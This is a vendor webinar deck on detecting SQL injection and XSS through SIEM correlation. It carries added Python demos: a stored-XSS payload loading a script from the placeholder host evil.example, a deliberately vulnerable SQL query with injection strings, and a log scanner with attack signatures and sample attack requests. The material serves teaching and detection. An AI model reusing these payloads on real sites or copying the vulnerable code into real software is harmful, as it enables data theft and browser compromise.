How to Detect SQL Injections & XSS Attacks Using SIEM Event Correlation



Two of the oldest and most common attacks used against web applications, SQL injection attacks and cross-site scripting attacks (XSS), continue to impact thousands of websites and millions of users each year. Finding these exposures quickly is essential in order to prevent system compromise and avoid information leakage. SIEM solutions can be invaluable in this effort by collecting and correlating the data you need to identify patterns that signal an attack.

Join AlienVault for this session to learn:

*What data you need to collect to identify the warning signs of an attack
*How to use event correlation to detect cross-site scripting (XSS) and SQL Injection attacks
*How to identify impacted assets so you can quickly limit the damage

You'll come away from the session with a clear picture of how to use SIEM technology to detect these attacks and respond before they do lasting damage.

Published in: Technology

How to Detect SQL Injections & XSS Attacks Using SIEM Event Correlation

  1. HOW TO DETECT SQL INJECTION & XSS ATTACKS USING SIEM EVENT CORRELATION
     Tom D’Aquino, Sr. SIEM Engineer
  2. AGENDA
     • Today's threat landscape: realities and implications
     • Web application attacks: what are they and what harm can they bring?
     • Threat detection through correlation of NIDS, HIDS and IP reputation
     • AlienVault Unified Security Management (USM) at a glance
     • Demo environment details
     • Live demo of USM: data collection and correlation from a Network IDS to detect web application attacks, and leveraging the OSSEC HIDS agent to monitor web server logs for web application attacks
  3. THREAT LANDSCAPE: OUR NEW REALITY
     More and more organizations are finding themselves in the crosshairs of various bad actors, for a variety of reasons. The number of organizations experiencing high-profile breaches is unprecedented, and SMBs are increasingly the target. In 2012 (and we expect this to rise in 2013 and into 2014), 50% of all targeted attacks were aimed at businesses with fewer than 2,500 employees. In fact, the largest growth area for targeted attacks in 2012 was businesses with fewer than 250 employees; 31% of all targeted attacks were aimed at them.
  4. THREAT LANDSCAPE: WEB APPLICATION ATTACKS
     XSS (Cross Site Scripting) and SQL Injection are two of the most common methods of attacking web applications. XSS attacks let an attacker inject script into pages of a website they do not own, so that the script runs in other users' browsers. SQL Injection attacks let an attacker run their own SQL against the application's database and extract information from it, such as sensitive user information or user credentials.
  5. THREAT LANDSCAPE: CROSS SITE SCRIPTING ATTACKS
     XSS attacks are typically used to compromise a user's local system (for example by loading an exploit or malware from an attacker-controlled server) or to impersonate a user on the affected website by hijacking their session cookie. Stored XSS attacks typically require some kind of web form that lets users post content to the website, such as:
     • Comment forms on blog sites
     • Forums, message boards, etc.
     XSS attacks are easy to carry out using tools like the Browser Exploitation Framework (BeEF): http://beefproject.com/
  6. THREAT LANDSCAPE: CROSS SITE SCRIPTING ATTACKS (CONTINUED)
     Once the script is inserted into the web page, it is automatically executed by the victim's web browser every time the page is loaded; the victim does not have to click anything.
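A worked illustration of the stored XSS case described on slides 5 and 6, added here as an example; it is not part of the original webcast and not AlienVault code. It assumes a toy comment page rendered by Python string formatting. The comment store, the host evil.example and the hook.js filename are constructed for the example, and the script-tag check stands in for the kind of match a NIDS or HIDS signature makes.

```python
import html
import re

# Constructed payload in the style of a BeEF hook: a stored comment that pulls the
# attacker's script into every visitor's browser (evil.example is a placeholder host).
PAYLOAD = '<script src="http://evil.example/hook.js"></script>'

# Constructed comment store: one honest comment, one carrying the payload.
COMMENTS = [
    ("alice", "Great post, thanks!"),
    ("mallory", PAYLOAD),
]


def render_comment_vulnerable(author, body):
    # Stored XSS defect, deliberately kept: user content is concatenated into the page,
    # so markup in a comment becomes markup in every reader's browser.
    return f'<div class="comment"><b>{author}</b>: {body}</div>'


def render_comment_safe(author, body):
    # html.escape turns <, >, &, " and ' into entities; the browser shows the payload as text.
    return (f'<div class="comment"><b>{html.escape(author, quote=True)}</b>: '
            f'{html.escape(body, quote=True)}</div>')


def render_page(comments, renderer):
    # The page every visitor loads; with the vulnerable renderer the script runs on each load.
    return "<html><body>" + "".join(renderer(a, b) for a, b in comments) + "</body></html>"


def contains_active_script(page):
    # The same check a log- or packet-based signature makes: an unescaped <script ...> tag.
    return re.search(r"(?i)<\s*script\b", page) is not None


if __name__ == "__main__":
    print("vulnerable page executes script:",
          contains_active_script(render_page(COMMENTS, render_comment_vulnerable)))
    print("escaped page executes script:   ",
          contains_active_script(render_page(COMMENTS, render_comment_safe)))
```

The escaped page still contains the attacker's text, which is the point: the fix is output encoding for the HTML context, not deleting the comment, and the encoded form is exactly what a detector looking for `<script` in stored content will no longer match.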
  7. THREAT LANDSCAPE: SQL INJECTION ATTACKS
     SQL Injection attacks are commonly used to extract sensitive information from web applications. Examples include:
     • User account information, i.e. email addresses and passwords
     • Stored credit card data
     • System configuration details
  8. THREAT LANDSCAPE: SQL INJECTION ATTACKS (CONTINUED)
     There are SQL Injection tricks that attackers use to find your interesting data, such as listing every table in the database by injecting a UNION SELECT against the database catalogue (information_schema.tables on MySQL, PostgreSQL and SQL Server).
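The table-listing trick on slide 8, worked through against an in-memory SQLite database. This is an added example, not code from the webcast or from AlienVault; the users and credit_cards tables and their rows are constructed, and SQLite's sqlite_master catalogue stands in for information_schema.tables on the server databases the slide has in mind.

```python
import sqlite3


def build_demo_db():
    # Constructed demo database standing in for the web application's backend.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password_hash TEXT)")
    conn.execute("CREATE TABLE credit_cards (id INTEGER PRIMARY KEY, user_id INTEGER, pan TEXT)")
    conn.executemany("INSERT INTO users (email, password_hash) VALUES (?, ?)",
                     [("alice@example.com", "hash-a"), ("bob@example.com", "hash-b")])
    conn.executemany("INSERT INTO credit_cards (user_id, pan) VALUES (?, ?)",
                     [(1, "4111111111111111")])
    conn.commit()
    return conn


def find_user_vulnerable(conn, email):
    # Deliberately vulnerable: the query is built by string concatenation, so a quote in
    # the input ends the string literal and the rest of the input is executed as SQL.
    sql = "SELECT email FROM users WHERE email = '" + email + "'"
    return [row[0] for row in conn.execute(sql)]


def find_user_safe(conn, email):
    # Parameterised query: the driver passes the value separately, never as SQL text.
    return [row[0] for row in conn.execute("SELECT email FROM users WHERE email = ?", (email,))]


# Attacker inputs (constructed). The first turns the WHERE clause into a tautology and dumps
# every row; the second UNIONs the catalogue table into the result and comments out the
# trailing quote the application appends, which lists every table in the database.
DUMP_ALL_USERS = "' OR '1'='1"
LIST_TABLES = "' UNION SELECT name FROM sqlite_master WHERE type='table' --"


if __name__ == "__main__":
    conn = build_demo_db()
    print("vulnerable, tautology:", find_user_vulnerable(conn, DUMP_ALL_USERS))
    print("vulnerable, catalogue:", find_user_vulnerable(conn, LIST_TABLES))
    print("parameterised, tautology:", find_user_safe(conn, DUMP_ALL_USERS))
    print("parameterised, catalogue:", find_user_safe(conn, LIST_TABLES))
```

With the table names in hand the attacker's next query targets credit_cards directly, which is why the catalogue query is worth a detection rule of its own: a request containing information_schema (or sqlite_master) has no legitimate reason to come from a browser.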
  9. THE ALIENVAULT USM SOLUTION: NETWORK INTRUSION DETECTION
     Network IDS is embedded in our platform, giving you the ability to detect network-level attacks, including identifying malicious web requests sent to your web server. Network IDS signatures are updated frequently to keep you on the front lines of advanced detection. Note that a network IDS only inspects plaintext HTTP; for HTTPS, either terminate or decrypt TLS in front of the sensor or rely on the web server's own logs (the Host IDS route on the next slide).
  10. THE ALIENVAULT USM SOLUTION: HOST INTRUSION DETECTION
     With Host IDS, you can monitor the logs of your IIS or Apache web server for indications of XSS and SQL Injection attacks:
     • Web server log monitoring
     • File integrity checking
     • Operating system logging
     • Centralized management
  11. THE ALIENVAULT USM SOLUTION: IP REPUTATION
     Tracking activity from attackers around the world allows AlienVault USM to alert you when known bad actors are hitting your web site. USM automatically correlates known attackers with malicious activity detected by both the network and host intrusion detection systems, so an IDS alert from an address already seen attacking others is escalated.
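The detection and correlation flow of slides 10 and 11 (HIDS-style monitoring of Apache access.log, then correlation of the resulting alerts with IP reputation and identification of the impacted assets), as an added example in Python. It is not AlienVault's or OSSEC's code; the rule patterns are a deliberately small stand-in for real IDS signatures, and the access.log lines, the server names web01 and web02, the scoring thresholds and the reputation list are all constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Apache "combined" access log format (the HIDS agent has to be told to watch this file).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Signature-style patterns, the kind of match a NIDS or HIDS rule makes on a decoded request.
SIGNATURES = {
    "sqli": re.compile(
        r"(?i)(\bunion\b[\s\S]{0,64}\bselect\b"        # UNION ... SELECT
        r"|\bor\b\s*['\"]?\w+['\"]?\s*=\s*['\"]?\w+"   # OR 1=1 / OR '1'='1
        r"|\binformation_schema\b|\bsqlite_master\b"   # catalogue enumeration
        r"|--\s*$)"),                                   # trailing SQL comment
    "xss": re.compile(
        r"(?i)(<\s*script\b|javascript:|\bon(?:load|error|click|mouseover)\s*=)"),
}

# Constructed access.log lines from two constructed web servers. 198.51.100.23 is the
# constructed "known bad" address used for the IP reputation correlation below.
SAMPLE_LOGS = {
    "web01": [
        '198.51.100.23 - - [10/Oct/2013:13:55:36 -0700] "GET /login.php?user=admin%27%20OR%20%271%27%3D%271&pass=x HTTP/1.1" 200 2326 "-" "sqlmap/1.0"',
        '198.51.100.23 - - [10/Oct/2013:13:55:37 -0700] "GET /products.php?id=1%20UNION%20SELECT%20name%20FROM%20sqlite_master-- HTTP/1.1" 500 512 "-" "sqlmap/1.0"',
        '203.0.113.7 - - [10/Oct/2013:14:02:11 -0700] "GET /search.php?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
        '192.0.2.10 - - [10/Oct/2013:14:05:00 -0700] "GET /index.php?page=about HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    ],
    "web02": [
        '198.51.100.23 - - [10/Oct/2013:14:10:42 -0700] "GET /comments.php?body=%253Cscript%2520src%253D%2522http%253A%252F%252Fevil.example%252Fhook.js%2522%253E HTTP/1.1" 403 199 "-" "sqlmap/1.0"',
    ],
}
KNOWN_BAD_IPS = {"198.51.100.23"}   # constructed reputation feed


def decode(target, rounds=3):
    # Attackers double-encode to slip past single-pass matching; decode until stable (bounded).
    for _ in range(rounds):
        new = unquote_plus(target)
        if new == target:
            break
        target = new
    return target


def scan(asset, lines):
    # HIDS-style pass over one server's access.log: one alert per matching signature per request.
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        request = decode(m["target"])
        for category, sig in SIGNATURES.items():
            if sig.search(request):
                alerts.append({"asset": asset, "src": m["ip"], "category": category,
                               "status": int(m["status"]), "request": request})
    return alerts


def scan_all(logs):
    return [a for asset, lines in logs.items() for a in scan(asset, lines)]


def correlate(alerts, reputation):
    # SIEM-style correlation: group by source, enrich with reputation, record impacted assets,
    # and raise priority when the server answered 2xx/3xx (the attack may have worked).
    incidents = {}
    for a in alerts:
        inc = incidents.setdefault(a["src"], {
            "src": a["src"], "known_bad": a["src"] in reputation,
            "categories": set(), "assets": set(), "events": 0, "succeeded": 0})
        inc["categories"].add(a["category"])
        inc["assets"].add(a["asset"])
        inc["events"] += 1
        if a["status"] < 400:
            inc["succeeded"] += 1
    for inc in incidents.values():
        score = 2 * inc["events"] + (5 if inc["known_bad"] else 0) + (3 if inc["succeeded"] else 0)
        inc["priority"] = "high" if score >= 8 else ("medium" if score >= 4 else "low")
    return incidents


if __name__ == "__main__":
    for inc in correlate(scan_all(SAMPLE_LOGS), KNOWN_BAD_IPS).values():
        print(inc["priority"], inc["src"], sorted(inc["categories"]), sorted(inc["assets"]))
```

Two details in the sample data matter in practice. The web02 request is double URL-encoded, which a single-pass decoder never turns into `<script`, so the decode step is part of the detection, not a nicety. And the 500 that web01 returned on the UNION SELECT request is itself a strong indicator: a database error on a query-string parameter is exactly what an injection probe produces, so a rule that pairs a signature hit with a 5xx from the same source deserves a higher priority than the simple score above gives it.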
  12. USM security capabilities (figure):
     • Asset Discovery: figure out what asset is valuable
       Active Network Scanning, Passive Network Scanning, Asset Inventory, Host-based Software Inventory
     • Vulnerability Assessment: identify ways the target could be compromised
       Network Vulnerability Testing
     • Threat Detection: start looking for threats
       Network IDS, Host IDS, Wireless IDS, File Integrity Monitoring
     • Behavioral Monitoring: look for strange activity which could indicate a threat
       Log Collection, Netflow Analysis, Service Availability Monitoring
     • Security Intelligence: piece it all together
       SIEM Correlation, Incident Response
  13. UNIFIED SECURITY MANAGEMENT
     “Security Intelligence through Integration that we do, NOT you”
     USM Platform
     • Bundled Products - 30 Open-Source Security tools to plug the gaps in your existing controls
     • USM Framework - Configure, Manage, & Run Security Tools. Visualize output and run reports
     • USM Extension API - Support for inclusion of any other data source into the USM Framework
     • Open Threat Exchange - Provides threat intelligence for collaborative defense
  14. DEMO NETWORK DETAILS
     The demo environment that we are testing in today contains the following:
  15. NON-DEFAULT CONFIGURATION
     Apache access.log monitoring is not a default behavior of the AlienVault HIDS agent: the OSSEC agent's ossec.conf needs a localfile entry for access.log with log_format set to apache before any web requests reach the SIEM. Two caveats apply before relying on this feed. The access log records the request line (method, URL and query string) but not POST bodies, so a stored XSS or SQL Injection payload submitted through a form body is visible to the network IDS (on plaintext HTTP) but never appears in access.log. And the server logs the URL as the client encoded it, so the log decoder or the correlation rule has to URL-decode the request, including double encoding, before matching it against signatures.
  16. NOW FOR SOME Q&A…
     Three Ways to Test Drive AlienVault
     • Download a Free 30-Day Trial: http://www.alienvault.com/free-trial
     • Try our Interactive Demo Site: http://www.alienvault.com/live-demo-site
     • Join us for a live Demo: http://www.alienvault.com/marketing/alienvault-usmlive-demo
     Questions? hello@alienvault.com
  17. VIEW ON-DEMAND VIDEO
     To view a recorded version of this webcast on-demand, click here.